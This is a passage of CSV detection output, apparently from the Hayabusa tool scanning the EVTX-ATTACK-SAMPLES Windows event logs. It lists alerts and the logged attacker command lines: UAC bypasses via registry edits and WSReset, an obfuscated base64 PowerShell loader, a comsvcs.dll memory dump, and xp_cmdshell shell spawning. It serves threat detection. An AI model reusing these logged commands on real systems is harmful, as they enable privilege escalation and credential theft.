Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: 